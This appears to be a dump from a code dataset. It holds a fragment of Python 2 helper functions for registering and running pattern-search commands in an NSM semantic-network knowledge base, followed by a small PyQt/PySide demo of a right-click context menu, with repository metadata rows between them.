print "[NSM] Register new NSM command"
    # create the NSM command node
sc_nsm_command = session.create_el(segment, pm.SC_N_CONST)
session.gen3_f_a_f(segment,nsm.nsm_command,sc_nsm_command, pm.SC_A_CONST|pm.SC_POS|pm.SC_ACTUAL)
    # create the NSM command sheaf (bundle) node
sc_nsm_command_sheaf = session.create_el(segment, pm.SC_N_CONST)
    # link the two nodes under the attr_nsm_command_ attribute
arc = session.gen3_f_a_f(segment, sc_nsm_command, sc_nsm_command_sheaf, pm.SC_A_CONST|pm.SC_POS|pm.SC_ACTUAL)[1]
session.gen3_f_a_f(segment, nsm.attr_nsm_command, arc, pm.SC_A_CONST|pm.SC_POS|pm.SC_ACTUAL)
    # create the search pattern node of the NSM command
sc_nsm_pattern = session.create_el(segment, pm.SC_N_CONST)
    # add the pattern node to the command sheaf under the pattern_ attribute
arc = session.gen3_f_a_f(segment, sc_nsm_command_sheaf, sc_nsm_pattern, pm.SC_A_CONST|pm.SC_POS|pm.SC_ACTUAL)[1]
session.gen3_f_a_f(segment, nsm.attr_nsm_command_pattern, arc, pm.SC_A_CONST|pm.SC_POS|pm.SC_ACTUAL)
    # copy the search pattern into the NSM command
q = session.copySetToSet(segment,sc_pattern_set,sc_nsm_pattern)
    # create the parameters (elements) node of the NSM command
sc_nsm_command_elem = session.create_el(segment, pm.SC_N_CONST)
    # add the elements node to the command sheaf under the elem_ attribute
arc = session.gen3_f_a_f(segment, sc_nsm_command_sheaf,
sc_nsm_command_elem, pm.SC_A_CONST|pm.SC_POS|pm.SC_ACTUAL)[1]
session.gen3_f_a_f(segment, nsm.attr_nsm_command_elem, arc, pm.SC_A_CONST|pm.SC_POS|pm.SC_ACTUAL)
    # copy the command attributes (elements) under the 1_..10_ attributes
for i, el in enumerate(command_elem_list):
if i < 10:
arc = session.gen3_f_a_f(segment, sc_nsm_command_elem, el, pm.SC_A_CONST|pm.SC_POS|pm.SC_ACTUAL)[1]
session.gen3_f_a_f(segment, nsm.attr[i], arc, pm.SC_A_CONST|pm.SC_POS|pm.SC_ACTUAL)
    # create the short name node of the NSM command and add it
sc_nsm_command_short_name = session.create_el(segment, pm.SC_N_CONST)
session.set_content_str(sc_nsm_command_short_name, str_command_short_name)
arc = session.gen3_f_a_f(segment, sc_nsm_command_sheaf,
sc_nsm_command_short_name, pm.SC_A_CONST|pm.SC_POS|pm.SC_ACTUAL)[1]
session.gen3_f_a_f(segment, nsm.attr_nsm_command_shortname, arc, pm.SC_A_CONST|pm.SC_POS|pm.SC_ACTUAL)
    # create the comment node of the NSM command and add it
sc_nsm_command_comment = session.create_el(segment, pm.SC_N_CONST)
session.set_content_str(sc_nsm_command_comment, str_command_comment)
arc = session.gen3_f_a_f(segment, sc_nsm_command_sheaf,
sc_nsm_command_comment, pm.SC_A_CONST|pm.SC_POS|pm.SC_ACTUAL)[1]
session.gen3_f_a_f(segment, nsm.attr_nsm_command_comment, arc, pm.SC_A_CONST|pm.SC_POS|pm.SC_ACTUAL)
return sc_nsm_command
def runNSMCommandWithParams(sc_nsm_command,
command_elem_list = [],
search = True):
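    # Build a goal (request) node for an existing NSM command: the call
    # arguments are attached to the request sheaf under 1_..10_ and the sheaf
    # arc is marked active_ plus search_ or generate_.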
#print "[NSM] run NSM command with params"
sc_nsm_request = session.create_el(segment, pm.SC_N_CONST)
session.gen3_f_a_f(segment, nsm.goals, sc_nsm_request, pm.SC_A_CONST|pm.SC_POS|pm.SC_ACTUAL)
sc_nsm_request_sheaf = session.create_el(segment, pm.SC_N_CONST)
arc_sheaf = session.gen3_f_a_f(segment, sc_nsm_request, sc_nsm_request_sheaf, pm.SC_A_CONST|pm.SC_POS|pm.SC_ACTUAL)[1]
for i, el in enumerate(command_elem_list):
arc = session.gen3_f_a_f(segment, sc_nsm_request_sheaf, el, pm.SC_A_CONST|pm.SC_POS|pm.SC_ACTUAL)[2]
session.gen3_f_a_f(segment, nsm.attr[i], arc, pm.SC_A_CONST|pm.SC_POS|pm.SC_ACTUAL)
session.gen3_f_a_f(segment, sc_nsm_command, arc_sheaf, pm.SC_A_CONST|pm.SC_POS|pm.SC_ACTUAL)
session.gen3_f_a_f(segment, nsm.attr_active, arc_sheaf, pm.SC_A_CONST|pm.SC_POS|pm.SC_ACTUAL)
if search:
session.gen3_f_a_f(segment, nsm.attr_search, arc_sheaf, pm.SC_A_CONST|pm.SC_POS|pm.SC_ACTUAL)
else:
session.gen3_f_a_f(segment, nsm.attr_generate, arc_sheaf, pm.SC_A_CONST|pm.SC_POS|pm.SC_ACTUAL)
return sc_nsm_request
def runNSMwithPattern(sc_pattern,
search = True, patternName = None):
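    # Build a goal node directly from a pattern set: every element of the
    # pattern is copied into the request sheaf, and the sheaf arc is marked
    # active_, confirm_ and either search_ or generate_.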
#print "[NSM] run NSM with pattern"
sc_nsm_request = session.create_el(segment, pm.SC_N_CONST)
if patternName is not None:
session.set_content_str(sc_nsm_request, patternName)
session.gen3_f_a_f(segment, nsm.goals, sc_nsm_request, pm.SC_A_CONST|pm.SC_POS|pm.SC_ACTUAL)
sc_nsm_request_sheaf = session.create_el(segment, pm.SC_N_CONST)
arc_sheaf = session.gen3_f_a_f(segment, sc_nsm_request, sc_nsm_request_sheaf, pm.SC_A_CONST|pm.SC_POS|pm.SC_ACTUAL)[1]
pat_els = session.search3_f_a_a(sc_pattern, pm.SC_A_CONST|pm.SC_POS|pm.SC_ACTUAL, pm.SC_EMPTY)
for el in pat_els:
session.gen3_f_a_f(segment, sc_nsm_request_sheaf, el[2], pm.SC_A_CONST|pm.SC_POS|pm.SC_ACTUAL)
session.gen3_f_a_f(segment, nsm.attr_active, arc_sheaf, pm.SC_A_CONST|pm.SC_POS|pm.SC_ACTUAL)
session.gen3_f_a_f(segment, nsm.attr_confirm_, arc_sheaf, pm.SC_A_CONST|pm.SC_POS|pm.SC_ACTUAL)
if search:
session.gen3_f_a_f(segment, nsm.attr_search, arc_sheaf, pm.SC_A_CONST|pm.SC_POS|pm.SC_ACTUAL)
else:
session.gen3_f_a_f(segment, nsm.attr_generate, arc_sheaf, pm.SC_A_CONST|pm.SC_POS|pm.SC_ACTUAL)
return sc_nsm_request
def getNSMRequestScResult(sc_nsm_request, wait_for_result = True, wait_time = 0.1):
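    # Poll the request until the NSM agent marks it searched_, then look for a
    # confirmed_ mark and return the attached Result set node, or None.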
print "[NSM] search for NSM request result"
# wait for searched_
res = session.search5_f_a_a_a_f(sc_nsm_request,
pm.SC_A_CONST|pm.SC_POS,
pm.SC_N_CONST,
pm.SC_A_CONST|pm.SC_POS,
nsm.attr_searched)
while not res:
if wait_for_result:
print "[NSM] wait for result"
time.sleep(wait_time)
else:
return None
res = session.search5_f_a_a_a_f(sc_nsm_request,
pm.SC_A_CONST|pm.SC_POS,
pm.SC_N_CONST,
pm.SC_A_CONST|pm.SC_POS,
nsm.attr_searched)
# search for confirmed_
sc_nsm_arc_sheaf = res[0][1]
res = session.search3_f_a_f(nsm.attr_confirmed,
pm.SC_A_CONST|pm.SC_POS,
sc_nsm_arc_sheaf)
if not res:
print "[nsm] no any results found"
return None
res = session.search3_a_a_f(pm.SC_N_CONST,
pm.SC_A_CONST|pm.SC_POS,
sc_nsm_arc_sheaf)
for set in res:
if session.search3_f_a_f(nsm.result,pm.SC_A_CONST|pm.SC_POS,set[0]):
print "[NSM] find result"
return set[0]
print "[nsm] no any results found"
return None
def convertNsmResult2SimpleSet(sc_nsm_result):
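    # Flatten an NSM result into a plain list of found elements: for every
    # result variant take the element bound under 2_ in each element sheaf,
    # then append the constant elements of the original pattern.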
res = []
result_variants = session.search3_f_a_a(sc_nsm_result, pm.SC_A_CONST|pm.SC_POS, pm.SC_N_CONST)
if result_variants is None: return None
for res_variant in result_variants:
cur_element_sheafs = session.search3_f_a_a(res_variant[2], pm.SC_A_CONST|pm.SC_POS, pm.SC_N_CONST)
if not cur_element_sheafs: continue
#print cur_element_sheafs
for cur_element_sheaf in cur_element_sheafs:
#print cur_element_sheaf
cur_find_element = session.search5_f_a_a_a_f(cur_element_sheaf[2],
pm.SC_A_CONST|pm.SC_POS,
pm.SC_EMPTY,
pm.SC_A_CONST|pm.SC_POS,
nsm.n_2)
if not cur_find_element: continue
res.append(cur_find_element[0][2])
const_elements = getConstPatternElsByScResult(sc_nsm_result)
if const_elements:
res = res + const_elements
return res
def convertNsmResult2Sets(sc_nsm_result):
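    # Like convertNsmResult2SimpleSet, but keeps the structure: one list per
    # result variant, each holding [pattern element (1_), found element (2_)]
    # pairs.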
res = []
result_variants = session.search3_f_a_a(sc_nsm_result, pm.SC_A_CONST|pm.SC_POS, pm.SC_N_CONST)
if result_variants is None: return None
for res_variant in result_variants:
v_res = []
cur_element_sheafs = session.search3_f_a_a(res_variant[2], pm.SC_A_CONST|pm.SC_POS, pm.SC_N_CONST)
if not cur_element_sheafs: continue
for cur_element_sheaf in cur_element_sheafs:
s_res = []
cur_find_element = session.search5_f_a_a_a_f(cur_element_sheaf[2],
pm.SC_A_CONST|pm.SC_POS,
pm.SC_EMPTY,
pm.SC_A_CONST|pm.SC_POS,
nsm.n_1)
if not cur_find_element: continue
s_res.append(cur_find_element[0][2])
cur_find_element = session.search5_f_a_a_a_f(cur_element_sheaf[2],
pm.SC_A_CONST|pm.SC_POS,
pm.SC_EMPTY,
pm.SC_A_CONST|pm.SC_POS,
nsm.n_2)
if not cur_find_element: continue
s_res.append(cur_find_element[0][2])
v_res.append(s_res)
res.append(v_res)
return res
def getConstPatternElsByScResult(sc_nsm_result):
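    # Walk from the result node back to the original search pattern and return
    # its constant elements, or None when there are none.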
temp = session.search3_f_a_a(sc_nsm_result, pm.SC_A_CONST|pm.SC_POS, pm.SC_A_CONST|pm.SC_POS)
if not temp: return None
print temp
sheafArc = temp[0][2]
print sheafArc
sc_pattern = session.search3_a_f_a(pm.SC_N_CONST, sheafArc, pm.SC_N_CONST)[0][2]
consts = session.search3_f_a_a(sc_pattern, pm.SC_A_CONST|pm.SC_POS, pm.SC_CONST)
res = []
for els in consts:
res.append(els[2])
    if len(res) == 0: return None
return res
| lgpl-3.0 | 4,471,898,048,388,171,000 | 51.608414 | 122 | 0.607998 | false |
alexlib/Qt-Python-Binding-Examples | common_widgets/menu/popup_menu_by_right_click.py | 1 | 1959 | #!/usr/bin/env python
#-*- coding:utf-8 -*-
"""
popup menu by right click
Tested environment:
Mac OS X 10.6.8
http://developer.qt.nokia.com/doc/qt-4.8/qmenu.html#details
http://diotavelli.net/PyQtWiki/Handling%20context%20menus
"""
import sys
try:
from PySide import QtCore, QtGui
except ImportError:
from PyQt4 import QtCore, QtGui
class Demo(QtGui.QMainWindow):
def __init__(self):
super(Demo, self).__init__()
x, y, w, h = 500, 200, 300, 400
self.setGeometry(x, y, w, h)
self.popup_menu = QtGui.QMenu(self)
# menu item
self.item_add_act = QtGui.QAction("Add", self)
self.item_add_act.triggered.connect(self.add_cb)
self.popup_menu.addAction(self.item_add_act)
self.item_delete_act = QtGui.QAction("Delete", self)
self.item_delete_act.triggered.connect(self.delete_cb)
self.popup_menu.addAction(self.item_delete_act)
self.popup_menu.addSeparator()
self.item_rename_act = QtGui.QAction("Rename", self)
self.item_rename_act.triggered.connect(self.rename_cb)
self.popup_menu.addAction(self.item_rename_act)
def add_cb(self):
print "add callback"
def delete_cb(self):
print "delete callback"
def rename_cb(self):
print "rename callback"
def contextMenuEvent(self, event):
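        # Qt invokes this handler for context-menu requests (e.g. a right
        # click); exec_() shows the menu at the given global position and
        # blocks until an action is chosen or the menu is dismissed.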
point = self.mapToGlobal(event.pos())
act = self.popup_menu.exec_(point)
if act == self.item_add_act:
print "item add clicked"
elif act == self.item_delete_act:
print "item delete clicked"
elif act == self.item_rename_act:
print "item rename clicked"
return super(Demo, self).contextMenuEvent(event)
def show_and_raise(self):
self.show()
self.raise_()
if __name__ == "__main__":
app = QtGui.QApplication(sys.argv)
demo = Demo()
demo.show_and_raise()
    sys.exit(app.exec_())
| bsd-3-clause | 1,564,691,287,392,536,600 | 24.454545 | 62 | 0.617662 | false |